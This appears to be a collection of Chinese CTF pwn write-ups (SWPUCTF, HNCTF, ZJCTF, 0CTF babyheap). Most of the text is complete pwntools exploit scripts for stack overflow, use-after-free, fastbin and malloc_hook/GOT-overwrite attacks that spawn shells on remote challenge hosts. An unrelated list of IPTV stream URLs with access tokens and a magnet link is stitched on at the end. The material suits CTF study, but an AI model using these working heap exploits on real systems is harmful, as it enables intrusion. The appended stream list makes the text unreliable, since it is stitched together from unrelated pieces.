Problem: [SWPUCTF 2022 新生赛]FindanotherWay

思路

有后门函数0x401230
输入函数vuln 调用gets(s) 栈溢出
栈12 + 8 覆盖rbp 然后p64后门函数就行
注意的是直接用后门函数栈不对齐 故跳过保存rbp 用0x401235 可以getshell

EXP

  from pwn import *
context.log_level = 'debug'
elf = ELF("./FindanotherWay")
#libc = ELF('/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so')
p = remote("node5.anna.nssctf.cn",25105)
#p = process("./FindanotherWay")
p.recvuntil(b"Maybe another way?\n")
payload = b'a'*12 +b'a' *0x8 + p64(0x401235)
p.send(payload)
#attach(p)
p.interactive()

总结

• 对该题的考点总结

Problem: [HNCTF 2022 WEEK4]ez_uaf

思路

泄露libc 然后打malloc_hook

EXP

一开始不知道大于0x410可以不进tcache
用的填满打的 本机可以打通 不知道为什么远程打不通 看了一下log 获取的libc_base不对 好像截断了。

  from pwn import *
context.log_level = 'debug'
p = remote("node5.anna.nssctf.cn",23814)
#p = process("./ez_uaf")
#r = remote(host,port)
e = ELF('./ez_uaf')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

def new(size,name,content):
    p.sendafter(b'Choice: \n',str(1))
    p.sendafter(b'Size:\n',str(size))
    p.sendafter(b'Name: \n',name)
    p.sendafter(b'Content:\n',content)

def free(idx):
    p.sendafter(b'Choice: \n',str(2))
    p.sendafter(b'Input your idx:\n',str(idx))

def show(idx):
    p.sendafter(b'Choice: \n',str(3))
    p.sendafter(b'Input your idx:\n',str(idx))


def edit(idx,content):
    p.sendafter(b'Choice: \n',str(4))
    p.sendafter(b'Input your idx:\n',str(idx))
    p.send(content)

new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)

new(0x80,b'qwq',b'a'*0x80)
new(0x20,b'qwq',b'a'*0x20) # fake 8




for i in range(9):
    free(i)

show(7)
main_arena = u64(p.recv(7)[1:].ljust(8,b'\x00'))
log.success("main_arena=>"+hex(main_arena))
fake_fastbin = main_arena - 0x7b
log.success("fake_fastbin=>"+hex(fake_fastbin))
new(0x60,b'qwq',b'a'*0x60) #9
free(9)
edit(9,p64(fake_fastbin))

new(0x60,b'qwq',b'a'*0x60) #10


libc_base = main_arena -88 -0x18 - libc.sym["__malloc_hook"]
log.success("libc_base=>"+hex(libc_base))
one_gadget = libc_base + 0x10a2fc
payload = b'a'*11 + p64(one_gadget)
new(0x60,b'qwq',payload) #11
#attach(p)
p.sendafter(b'Choice: \n',str(1))
p.sendafter(b'Size:\n',str(10))

#edit(0,b'c'*0x80)
p.interactive()

后面换成0x410不进tcache就可以打通远程了

  from pwn import *
context.log_level = 'debug'
p = remote("node5.anna.nssctf.cn",23814)
#p = process("./ez_uaf")
#r = remote(host,port)
e = ELF('./ez_uaf')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

def new(size,name,content):
    p.sendafter(b'Choice: \n',str(1))
    p.sendafter(b'Size:\n',str(size))
    p.sendafter(b'Name: \n',name)
    p.sendafter(b'Content:\n',content)

def free(idx):
    p.sendafter(b'Choice: \n',str(2))
    p.sendafter(b'Input your idx:\n',str(idx))

def show(idx):
    p.sendafter(b'Choice: \n',str(3))
    p.sendafter(b'Input your idx:\n',str(idx))


def edit(idx,content):
    p.sendafter(b'Choice: \n',str(4))
    p.sendafter(b'Input your idx:\n',str(idx))
    p.send(content)

new(0x410,b'qwq',b'a'*0x410) #大于等于0x410不进tcache
new(0x20,b'qwq',b'a'*0x20)
new(0x30,b'qwq',b'a'*0x30)
free(0)
show(0)
p.recvuntil("\n")
main_arena = u64(p.recv(6).ljust(8,b'\x00')) 
libc_base = main_arena - 96 - 0x10 - libc.sym["__malloc_hook"]
log.success("libc_base=>"+hex(libc_base))
one_gadget = libc_base + 0x10a2fc
free(1)
free(2)
edit(1,p64(main_arena-0x7b))
new(0x20,b'qwq',b'a'*0x20)
new(0x20,b'qwq',b'a'*0x20) #4
edit(4,b'a'*11+p64(one_gadget))
#attach(p)

p.sendafter(b'Choice: \n',str(1))
p.sendafter(b'Size:\n',str(10))
p.interactive()

总结

tcache题还是知道的特性少了.

[ZJCTF 2019]EasyHeap

puts(“——————————–”);
puts(“ Easy Heap Creator “);
puts(“——————————–”);
puts(“ 1. Create a Heap “);
puts(“ 2. Edit a Heap “);
puts(“ 3. Delete a Heap “);
puts(“ 4. Exit “);
puts(“——————————–”);
return printf(“Your choice :”);

from pwn import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
elf = ELF("/home/rick/Downloads/easyheap/easyheap")
p = remote("node5.buuoj.cn",29263)
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
    attach(p)
    pause()

def alloc(size,content):
    p.recvuntil("Your choice :")
    p.sendline('1')
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap:")
    p.sendline(content)

def edit(idx, size, content):
    p.recvuntil("Your choice :")
    p.sendline('2')
    p.recvuntil("Index :")
    p.sendline(str(idx))
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap : ")
    p.sendline(content)

def free(idx):
    p.recvuntil("Your choice :")
    p.sendline('3')
    p.recvuntil("Index :")
    p.sendline(str(idx))


bss_heaparray = 0x6020E0
using_fake_chunk = bss_heaparray - 0x33
alloc(0x60,b"rick")
alloc(0x60,b"rick")
alloc(0x60,b"rick") #2

free(2)
payload = b'/bin/sh\x00' +b'A'*0x60 + p64(0x71) + p64(using_fake_chunk)
edit(1,len(payload),payload)
alloc(0x60,b"rick")
alloc(0x60,b"rick") #alloc fake chunk
payload=p64(0)*4+b'A'*0x3+p64(elf.got["free"])

edit(3,len(payload),payload)

payload = p64(elf.plt["system"])
edit(0,len(payload),payload) # now modify free got
free(1)

p.interactive()

通过修改bss静态段的heaparray来使idx0变成free的got表 然后写入system的plt 随后free就执行

add(0x10)
add(0x10)
add(0x10)
add(0x10) #fastbin
add(0x80) #unsorted_bin

wndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7290
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae72c0
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae72f0
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7320
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7350
Size: 0x90 (with flag bits: 0x91)

Top chunk | PREV_INUSE
Addr: 0x58b22aae73e0
Size: 0x20c20 (with flag bits: 0x20c21)

size 0x20 是因为size 和 prev_size 占0x10

free chunk1 和2

可以看到进入fastbins 里面了 chunk 2 fd 指 chunk1 LIFO 后入先出

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload +=p8(80)

从10开始溢出

payload = p64(0)*3 写chunk0 fd bk ,chunk1 prev size

p64(0x21) chunk1 size

*p64(0)*3 chunk1 fd bk,chunk2 prev size

p64(0x21) chunk2 size
payload +=p8(80) 到fd了 溢出改后面80 指出4号chunk

0x33 计算

因为头部字段占0x21

需要将第二个字段 错位成我们要的size 0x70-0x7f

0x74ab97bc4b0d 数据区从这里开始

0x74ab97bc4b10 这是libc_hook地址

相减=3 这就是说我们需要写三个垃圾就行

from pwn import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
elf = ELF("./babyheap_0ctf_2017")
p = process("./babyheap_0ctf_2017")
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
    attach(p)
    pause()
def allo(size):
	p.recvuntil("Command: ")
	p.sendline(str(1))
	p.recvuntil("Size: ")
	p.sendline(str(size))

def fill(idx,size,content):
	p.recvuntil("Command: ")
	p.sendline(str(2))
	p.recvuntil("Index: ")
	p.sendline(str(idx))
	p.recvuntil("Size: ")
	p.sendline(str(size))
	p.recvuntil("Content: ")
	p.sendline(content)

def free(idx):
	p.recvuntil("Command: ")
	p.sendline(str(3))
	p.recvuntil("Index: ")
	p.sendline(str(idx))

def dump(idx):
	p.recvuntil("Command: ")
	p.sendline(str(4))
	p.recvuntil("Index: ")
	p.sendline(str(idx))
    

allo(0x10)#0
allo(0x10)#1
allo(0x10)#2
allo(0x10)#3
allo(0x80)#4
free(1)
free(2)

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload += p8(0x80) # 使2的chunk空闲块指向了4号块的位置,4号位为较大的chunk，用来获取目标地址
fill(0,len(payload),payload)

payload = p64(0)*3 + p64(0x21)
fill(3,len(payload),payload) # 让4号块的大小变成0x21，这样4号块就意义上被free了

allo(0x10)#1 The original position of 2 # 申请原本2号块
allo(0x10)#2 4 Simultaneous pointing	# 这里就会申请到4号块的位置

payload = p64(0)*3 + p64(0x91)
fill(3,len(payload),payload) # 将4号块的大小改回 0x91,不然找不到top chunk位置

allo(0x80) # 在申请一块大空间，避免4号块和top chunk合并

free(4)    # 释放4号块

dump(2)
p.recvuntil('Content: \n')
unsortedbin_addr = u64(p.recv(8).ljust(8,b'\0'))

main_arena = unsortedbin_addr - 88
_libc_hook = main_arena - 0x10
local_libc_hook_addr = libc.sym["__malloc_hook"]
_libc_base_addr = _libc_hook - local_libc_hook_addr
execve_addr = _libc_base_addr + 0x4527a
fake_chunk_addr = main_arena -0x33 #错位成我们要的size 0x70-0x7f
log.info("main_arena:"+hex(main_arena))
log.info("_libc_base_addr :"+hex(_libc_base_addr))
log.info("_libc_hook :"+hex(_libc_hook))
allo(0x60) # cut chunk -> 0x60 fastbins -> 0x20 unsortbins
free(4)
payload=p64(fake_chunk_addr) #overwrite idx2(0x20,unsortbin)fd
fill(2,len(payload),payload)
allo(0x60) #alloc free(4) chunk 0x60 -> fastbin
allo(0x60) #alloc fake chunk 
payload=b'a'*(0x8+0x3+0x8) + p64(execve_addr) #0x8 fd 0x8 bk 0x3 错位恢复
fill(6,len(payload),payload)
allo(0x79)
debug()
p.interactive()

IPTV(推荐)IPTV(推荐)

rtsp://118.123.56.55:554/PLTV/88888893/224/3221227219/10000100000000060000000001366244_0.smil

CCTV-5-720P(移动源)CCTV-5-720P(移动源)

http://223.110.245.167/ott.js.chinamobile.com/PLTV/3/224/3221226942/index.m3u8

CCTV-5-1080P(北京 移动)CCTV-5-1080P(北京 移动)

http://39.134.52.171/wh7f454c46tw3773685428_-1812949401/hwottcdn.ln.chinamobile.com/PLTV/88888890/224/3221226035/index.m3u8

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

rtsp://124.224.238.165/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

rtsp://124.224.238.165:554/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

http://124.224.238.170/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(中国 教育网)CCTV-5-1080P(中国 教育网)

http://ivi.bupt.edu.cn/hls/cctv5hd.m3u8

CCTV-5-576P(邵阳 联通)CCTV-5-576P(邵阳 联通)

http://hnsyx.chinashadt.com:2036/live/tv17.stream/playlist.m3u8

CCTV-5-1080P(西安 广电网)CCTV-5-1080P(西安 广电网)

http://124.47.33.200/PLTV/88888888/224/3221225489/index.m3u8

CCTV-5-1080P(阳泉 铁通)CCTV-5-1080P(阳泉 铁通)

http://222.37.8.77:13164/playurl?playtype=live&protocol=http&accesstoken=G214BC3E7V11307D1TC05A0AJBD5302ABM7867DF14I9F9DD772&&playtoken=ABCDEFGH&programid=4200000123

CCTV-5-1080P(珠江 宽频/联通)CCTV-5-1080P(珠江 宽频/联通)

http://116.199.5.51:8114/LIVES/index.m3u8?Fsv_otype=1&FvSeid=&Pcontent_id=&Provider_id=&Fsv_chan_hls_se_idx=39

VIUTV-1080P(美国 粤语)VIUTV-1080P(美国 粤语)

http://173.64.66.171:9981/stream/channel/968405a3b3d21b7a95bf7a0da2c161ee?ticket=F61D5B21491408F1B7437C9A856DEB803F87D2F2

CCTV-5-1080P(西安 广电网)CCTV-5-1080P(西安 广电网)

http://124.47.33.211/PLTV/88888888/224/3221225489/index.m3u8

CCTV-5-1080P(江苏 移动)CCTV-5-1080P(江苏 移动)

http://183.207.248.71/cntv/live1/HD-2500k-1080P-cctv5/HD-2500k-1080P-cctv5

magnet:?xt=urn:btih:066C588A6FE43CE29A07C96E4063357EB18433AB